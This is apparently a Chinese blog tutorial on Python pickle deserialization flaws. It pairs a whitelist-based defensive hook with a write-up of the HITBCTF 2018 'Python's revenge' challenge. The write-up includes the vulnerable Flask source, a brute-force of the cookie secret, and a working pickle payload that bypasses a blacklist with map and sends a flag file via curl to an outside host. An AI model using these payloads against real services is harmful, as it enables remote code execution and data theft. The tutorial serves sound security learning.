Pickle 反序列化漏洞
import cPickle
data = "test"
packed = cPickle.dumps(data) # 序列化
data = cPickle.loads(packed) # 反序列化
>>> packed
class A(object):
a = 'aaa'
b = 2
def __init__(self):
print self.a,self.b
print [pickle.dumps(A())]
aaa 2
但我们发现序列化的字符串中并没有A类的a,b属性的值,因为序列化存储的是对象的数据,而不是类的数据, 我们在构造函数中用self添加一个对象的成员数据
class A(object):
a = 'aaa'
b = 2
def __init__(self):
self.c = 'test'
print self.a,self.b
print [pickle.dumps(A())]
aaa 2
demo: 继承object类
class Test(object):
def __init__(self):
self.a = 1
self.b = '2'
self.c = '3'
aa = Test()
bb = pickle.dumps(aa)
print [bb],pickle.loads(bb)
["ccopy_reg\n_reconstructor\np0\n(c__main__\nTest\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nS'a'\np6\nI1\nsS'c'\np7\nS'3'\np8\nsS'b'\np9\nS'2'\np10\nsb."] <__main__.Test object at 0x7f2176f91610>
demo2 : 不继承object
class Test():
def __init__(self):
self.a = 1
self.b = '2'
self.c = '3'
aa = Test()
bb = pickle.dumps(aa)
print [bb],pickle.loads(bb)
["(i__main__\nTest\np0\n(dp1\nS'a'\np2\nI1\nsS'c'\np3\nS'3'\np4\nsS'b'\np5\nS'2'\np6\nsb."] <__main__.Test instance at 0x7f83aa698ef0>
这一切都是因为reduce 魔术方法,它在序列化的时候会完全改变被序列化的对象,这个方法相当的强大,官方建议不要直接操作这个方法,用更高级的接口 __getnewargs(), getstate() and setstate() 等代替。
class Test(object):
def __init__(self):
self.a = 1
self.b = '2'
self.c = '3'
def __reduce__(self):
return (os.system,('ls',))
aa = Test()
bb = pickle.dumps(aa)
print [bb],pickle.loads(bb)
- 我就着pickle模块看了一下,发现它是基于词法和语法分析(想想编译原理)来完成解析的,对每一个字符都注册相应的处理函数,挨个分析,分行读取处理(所以你会看到那么多 \n),最后在 R 标志符的时候执行调用操作
对于 pickle ,我觉得可以尝试去为Unpickler 添加一个自己写的装饰器,HOOK刚刚的 load_reduce 函数 ,用白名单的思想去解决。
#!/usr/bin/env python
# coding:utf-8
# author 9ian1i
# created at 2017.03.24
# a demo for filter unsafe callable object
from pickle import Unpickler as Unpkler
from pickle import *
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# 修改以下白名单,确认你允许通过的可调用对象
allow_list = [str, int, float, bytes, unicode]
class FilterException(Exception):
def __init__(self, value):
super(FilterException, self).__init__('the callable object {value} is not allowed'.format(value=str(value)))
def _hook_call(func):
"""装饰器 用来在调用callable对象前进行拦截检查"""
def wrapper(*args, **kwargs):
if args[0].stack[-2] not in allow_list:
# 我直接抛出自定义错误,改为你想做的事
raise FilterException(args[0].stack[-2])
return func(*args, **kwargs)
return wrapper
# 重写了反序列化的两个函数
def load(file):
unpkler = Unpkler(file)
unpkler.dispatch[REDUCE] = _hook_call(unpkler.dispatch[REDUCE])
return Unpkler(file).load()
def loads(str):
file = StringIO(str)
unpkler = Unpkler(file)
unpkler.dispatch[REDUCE] = _hook_call(unpkler.dispatch[REDUCE])
return unpkler.load()
def _filter_test():
test_str = 'c__builtin__\neval\np0\n(S"os.system(\'net\')"\np1\ntp2\nRp3\n.'
if __name__ == '__main__':
HITBCTF 2018 Python's revenge
from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
from cStringIO import StringIO
import random
import string
import os
import sys
import subprocess
import commands
import pickle
import cPickle
import marshal
import os.path
import filecmp
import glob
import linecache
import shutil
import dircache
import io
import timeit
import popen2
import code
import codeop
import pty
import posixfile
SECRET_KEY = 'you will never guess'
if not os.path.exists('.secret'):
with open(".secret", "w") as f:
secret = ''.join(random.choice(string.ascii_letters + string.digits)
for x in range(4))
with open(".secret", "r") as f:
cookie_secret = f.read().strip()
app = Flask(__name__)
black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]
def count():
session['cnt'] = 0
def home():
remembered_str = 'Hello, here\'s what we remember for you. And you can change, delete or extend it.'
new_str = 'Hello fellow zombie, have you found a tasty brain and want to remember where? Go right here and enter it:'
location = getlocation()
if location == False:
return redirect(url_for("clear"))
return render_template('index.html', txt=remembered_str, location=location)
def clear():
print("Reminder cleared!")
response = redirect(url_for('home'))
response.set_cookie('location', max_age=0)
return response
@app.route('/reminder', methods=['POST', 'GET'])
def reminder():
if request.method == 'POST':
location = request.form["reminder"]
if location == '':
print("Message cleared, tell us when you have found more brains.")
print("We will remember where you find your brains.")
location = b64e(pickle.dumps(location))
cookie = make_cookie(location, cookie_secret)
response = redirect(url_for('home'))
response.set_cookie('location', cookie)
print 'location'
return response
location = getlocation()
if location == False:
return redirect(url_for("clear"))
return render_template('reminder.html')
class FilterException(Exception):
def __init__(self, value):
super(FilterException, self).__init__(
'The callable object {value} is not allowed'.format(value=str(value)))
class TimesException(Exception):
def __init__(self):
super(TimesException, self).__init__(
'Call func too many times!')
def _hook_call(func):
def wrapper(*args, **kwargs):
session['cnt'] += 1
print session['cnt']
print args[0].stack
for i in args[0].stack:
if i in black_type_list:
raise FilterException(args[0].stack[-2])
if session['cnt'] > 4:
raise TimesException()
return func(*args, **kwargs)
return wrapper
def loads(strs):
files = StringIO(strs)
unpkler = pickle.Unpickler(files)
print strs,files,unpkler
unpkler.dispatch[pickle.REDUCE] = _hook_call(
return unpkler.load()
def getlocation():
cookie = request.cookies.get('location')
if not cookie:
return ''
(digest, location) = cookie.split("!")
print (digest, location),calc_digest(location, cookie_secret)
if not safe_str_cmp(calc_digest(location, cookie_secret), digest):
print("Hey! This is not a valid cookie! Leave me alone.")
return False
location = loads(b64d(location))
return location
def make_cookie(location, secret):
return "%s!%s" % (calc_digest(location, secret), location)
def calc_digest(location, secret):
return sha256("%s%s" % (location, secret)).hexdigest()
if __name__ == '__main__':
app.run(host="", port=5051)
- 访问
生成location, 本地爆破secret - 利用map函数绕过黑名单任意命令执行
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from hashlib import sha256
import string
import cPickle
import pickle
from cStringIO import StringIO
import os
from base64 import b64decode as b64d
from base64 import b64encode as b64e
#return sha256("%s%s" % (location, secret)).hexdigest()
class Test(object):
def __init__(self):
self.a = 1
self.b = '2'
self.c = '3'
def __reduce__(self):
return map,(os.system,["curl h7x7ty.ceye.io/`cat /flag_is_here|base64`"])
aa = Test()
payload = b64e(pickle.dumps(aa))
# print [bb]
# print [bb],pickle.loads(bb)
sdic = string.ascii_letters + string.digits
#payload = "Y19fYnVpbHRpbl9fCm1hcApwMAooY3Bvc2l4CnN5c3RlbQpwMQoobHAyClMnd2dldCAxMjMuMjA2LjY1LjE2NzoyMDAwL2B3aG9hbWlgJwpwMwphdHA0ClJwNQou"
old_digest = "f8a7e6ad4673e0ec405790e76934b7b0eb34d9b9a4c1eece0f9cb4d7ae71fff4"
# for a in sdic:
# for b in sdic:
# for c in sdic:
# for d in sdic:
# secret = a+b+c+d
# #print s
# digest = sha256(payload+secret).hexdigest()
# #print digest
# if digest == old_digest:
# print secret,digest
# break
print sha256(payload+"hitb").hexdigest()+'!'+payload
print sha256(payload+"LJIK").hexdigest()+'!'+payload
- Pickle反序列化知识之前没太深入了解,但通过看了很多资料最后还是成功做出了这题,CTF如果出现了你不了解的知识,可以先去看各种资料大概了解后再去做题,这才是CTF的魅力,也是CTFer需要掌握的本领
- 本地复现环境很重要。